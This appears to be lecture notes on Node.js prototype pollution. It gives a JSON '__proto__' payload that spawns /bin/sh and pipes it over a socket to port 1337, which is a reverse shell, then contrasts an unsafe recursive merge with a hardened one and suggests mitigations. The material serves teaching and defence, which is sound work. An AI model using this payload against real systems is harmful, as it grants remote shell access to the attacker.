2021 Node.js & JavaScript Prototype Chain Pollution
- 8. 6/21/21 7
Web-339
Payload:
{"__proto__": {"query": "return (function(){
var net = global.process.mainModule.constructor._load('net'),
cp = global.process.mainModule.constructor._load('child_process'),
sh = cp.spawn('/bin/sh', []);
var client = new net.Socket();
client.connect(1337, '127.0.0.1',
function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
return /a/;})();"}}
https://github.com/Stakcery/Web-Security.git
process.mainModule is equivalent to require (the payload loads modules through process.mainModule.constructor._load).
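
A defensive counterpart to the payload above, as an added example that is not part of the original slides: a recursive merge that follows the `__proto__` key, next to a hardened merge that drops it. The function names, the sample body and its harmless marker value are constructed; the assumption is that the application copies request JSON into an object with a merge of this kind.

```javascript
// Added example; unsafeMerge, safeMerge, demo and BODY are hypothetical names.
// BODY is a constructed request body with the same shape as the slide's payload,
// carrying a harmless marker string instead of code.
const BODY = '{"__proto__": {"query": "constructed-marker"}, "name": "guest"}';

const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Vulnerable pattern: JSON.parse creates an own "__proto__" key, for...in visits it,
// and target["__proto__"] resolves to Object.prototype, so the copy lands there.
function unsafeMerge(target, source) {
  for (const key in source) {
    if (isPlainObject(source[key]) && isPlainObject(target[key])) {
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened form: own keys only, prototype-reaching keys dropped, and recursion
// only into objects that the target itself owns.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

function demo() {
  const body = JSON.parse(BODY);
  const before = ({}).query;               // nothing inherited yet
  unsafeMerge({}, body);
  const afterUnsafe = ({}).query;          // every object now inherits "query"
  delete Object.prototype.query;           // undo the pollution for the next step
  const merged = safeMerge({}, body);
  return { before, afterUnsafe, afterSafe: ({}).query, mergedKeys: Object.keys(merged) };
}

console.log(demo());
```

Freezing `Object.prototype` at startup or building option objects with `Object.create(null)` limits the impact if a merge elsewhere in the code base is missed.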